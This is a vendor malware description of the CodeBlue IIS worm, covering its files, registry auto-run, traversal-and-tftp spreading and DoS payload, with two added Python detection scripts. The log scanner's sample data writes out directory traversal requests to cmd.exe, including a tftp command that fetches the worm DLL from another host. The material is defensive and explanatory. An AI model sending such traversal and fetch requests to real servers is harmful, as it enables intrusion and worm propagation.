Classification

Category :

Malware

Type :

Worm

Aliases :

CodeBlue, IISWorm_BlueCode, BlueCode, Code Blue

Summary

F-Secure have received no reports of this worm from the field.

CodeBlue is an Internet worm that targets Web sites by infecting Internet Information Servers (IIS).

Removal

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note: You need administrative rights to change the settings.

Technical Details

The worm spreads from one Web site to other Web sites by sending over its EXE file and executing it there.

The names of the worm's files are constant: SVCHOST.EXE and HTTPEXT.DLL. The EXE file is a Win32 application (PE EXE file) about 29K in length, written in Microsoft C++. A compressed variant was also discovered; it is about 14K in size.

Note that the worm uses the names of standard Win32 system files: SVCHOST.EXE and HTTPEXT.DLL can be found in the SYSTEM32 subfolder of a standard Windows 2000 installation.

The worm infects only machines that have the IIS package installed and Web site contents present. When the worm application runs on such a machine it locates and infects remote Web sites (remote machines with IIS installed): it enters them using a Web Directory Traversal exploit, sends its copy there, and spawns that copy. As a result the worm infects all vulnerable Web servers that can be reached from the currently infected machine, those infected servers spread the worm further, and so on.

The worm has a payload routine that, from 10:00am until 11:00am global time, performs a DoS (Denial of Service) attack on a machine that appears to be located somewhere in China.

When installing itself, the worm creates its copies (EXE and DLL) in the root of the C: drive, as C:\SVCHOST.EXE and C:\HTTPEXT.DLL. The EXE file is then registered in the Registry auto-run key:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 Domain Manager = C:\svchost.exe

The worm then creates and spawns the C:\D.VBS script file, looks for the INETINFO.EXE application and terminates it if it is active. The VBS script also looks for the Indexing Service, Indexing Query and printer mapping and removes them.

As a result, the worm closes the security holes that can be used (or were used) by other worms to infect the machine, or by hackers to break through Web security protections.
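The installation artifacts described above (two files dropped in the C: root, the D.VBS script and the "Domain Manager" auto-run value) are what an administrator would check for on a server. The following Python is an added example written for this page, not an F-Secure tool: it takes the root-directory listing and the contents of the Run key as plain values (the sample inputs are constructed) and keys on file location rather than name alone, since SVCHOST.EXE is legitimate in SYSTEM32 but not in the drive root. The extra check for any Run entry launching an svchost.exe from outside SYSTEM32 is a generalisation beyond what the page states.

```python
# Added example, not F-Secure's own tooling: host-side check for the CodeBlue
# installation artifacts. File-system and registry contents are passed in as
# plain Python values so the check runs offline; on a live host they would be
# read from the C: root and from the HKLM Run key.
from typing import Dict, Iterable, List

# Artifacts the description names: files dropped in the C: root and the
# auto-run value. Windows names are case-insensitive, so comparisons are too.
WORM_ROOT_FILES = {"svchost.exe", "httpext.dll", "d.vbs"}
RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "domain manager"
RUN_VALUE_DATA = r"c:\svchost.exe"


def find_codeblue_artifacts(root_files: Iterable[str],
                            run_values: Dict[str, str]) -> List[str]:
    """Return one finding string per matching artifact (empty list = clean).

    root_files: names of the files in the root of the C: drive.
    run_values: value name -> data, as read from the HKLM Run key.
    The check keys on location, not on file name alone: svchost.exe and
    httpext.dll are legitimate in SYSTEM32; a copy in the drive root is not.
    """
    findings: List[str] = []
    for name in root_files:
        if name.lower() in WORM_ROOT_FILES:
            findings.append(f"file C:\\{name} has a CodeBlue drop-file name")
    for name, data in run_values.items():
        value = data.strip().strip('"').lower()
        if name.strip().lower() == RUN_VALUE_NAME and value == RUN_VALUE_DATA:
            findings.append(f"{RUN_KEY}\\{name} = {data} (CodeBlue auto-run value)")
        elif value.endswith("\\svchost.exe") and "\\system32\\" not in value:
            # Generalisation beyond the page: a Run entry that launches an
            # svchost.exe from anywhere other than SYSTEM32 deserves a look.
            findings.append(
                f"{RUN_KEY}\\{name} launches svchost.exe outside SYSTEM32: {data}")
    return findings


if __name__ == "__main__":
    # Constructed sample data resembling an infected Windows 2000 host.
    sample_root = ["boot.ini", "pagefile.sys", "SVCHOST.EXE", "HTTPEXT.DLL", "D.VBS"]
    sample_run = {"Domain Manager": r"C:\svchost.exe"}
    for finding in find_codeblue_artifacts(sample_root, sample_run):
        print(finding)
```

Files whose names match but which sit in SYSTEM32 are deliberately not reported; a clean host with the legitimate svchost.exe therefore produces no findings.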

To spread further, the worm runs 100 threads that scan randomly selected IP addresses and attack them.

In 50% of cases the attacked machines are in the same network: the attacked IP addresses are "aa.bb.??.??", where "aa.bb" is taken from the infected machine's IP address and "??" are random.

In the other 50% of cases the attacked addresses are fully random.

To attack a victim machine the worm uses the Web Directory Traversal exploit three times:

1. it tries to determine the IIS directory on the remote machine,
2. then it sends a request to the remote machine to download the DLL component of the virus (the HTTPEXT.DLL file) from the infected one,
3. the last request copies that DLL file to the C: root directory.

To upload the DLL file to the victim machine the worm uses the "tftp" command, and activates a temporary TFTP server on the infected (current) machine to serve the "get data" command issued by the victim (remote) machine.

When the DLL file has been uploaded to the victim machine, it is activated by a trick. The worm copy thus starts on the remote server, then drops and executes the EXE component, which spreads the virus further.
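The spreading procedure above leaves a recognisable trace in the victim's IIS Web log: a short run of directory traversal requests from one client, one of them triggering a tftp transfer. The following Python is an added example, not part of F-Secure's description; the W3C-style field order and the sample log lines are constructed assumptions. The decoder handles percent-encoding and double encoding, but does not decode overlong UTF-8 byte sequences, which would need a separate step.

```python
# Added example, not F-Secure's own tooling: detection logic for the spreading
# behaviour described above, run over constructed IIS-style log lines.
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample log with the assumed field order
#   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# (real IIS logs declare their layout in a "#Fields:" header line).
SAMPLE_LOG = r"""
2001-09-01 10:05:12 10.1.55.20 GET /default.htm - 200
2001-09-01 10:05:14 10.1.77.9 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 200
2001-09-01 10:05:15 10.1.77.9 GET /scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe /c+tftp+-i+10.1.77.9+get+httpext.dll 200
2001-09-01 10:05:16 10.1.77.9 GET /scripts/%252e%252e/%252e%252e/winnt/system32/cmd.exe /c+copy+httpext.dll+c:\ 200
2001-09-01 10:05:30 10.1.55.21 GET /images/logo.gif - 304
""".strip()

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def normalize(uri: str) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded sequences such as
    %252e become '.', then unify path separators and case.
    Overlong UTF-8 byte sequences are not decoded here."""
    cur = uri
    for _ in range(3):
        decoded = unquote(cur)
        if decoded == cur:
            break
        cur = decoded
    return cur.replace("\\", "/").lower()


def has_traversal(uri: str) -> bool:
    """True when a '..' path segment survives normalisation."""
    return any(seg == ".." for seg in normalize(uri).split("/"))


def scan_iis_log(text: str) -> List[Dict[str, object]]:
    """Flag log lines showing traversal, a command interpreter request, or a
    tftp transfer triggered through the Web server."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # header or malformed line
        _date, _time, client, _method, stem, query, status = m.groups()
        reasons = []
        if has_traversal(stem) or has_traversal(query):
            reasons.append("directory traversal in request")
        if normalize(stem).endswith("/cmd.exe"):
            reasons.append("command interpreter requested over HTTP")
        if "tftp" in normalize(query):
            reasons.append("tftp transfer triggered via web request")
        if reasons:
            findings.append({"client": client, "status": int(status),
                             "reasons": reasons, "line": line})
    return findings


def suspicious_clients(findings: List[Dict[str, object]],
                       min_hits: int = 3) -> List[str]:
    """Clients with at least min_hits flagged requests; the default of three
    matches the three-request sequence the worm sends to each victim."""
    counts: Dict[str, int] = {}
    for f in findings:
        client = str(f["client"])
        counts[client] = counts.get(client, 0) + 1
    return sorted(c for c, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    hits = scan_iis_log(SAMPLE_LOG)
    for h in hits:
        print(h["client"], h["status"], "; ".join(h["reasons"]))
    print("clients matching the worm's request pattern:", suspicious_clients(hits))
```

A status of 200 on a flagged line means the server served the request, so those entries should be treated as a likely compromise rather than a blocked probe.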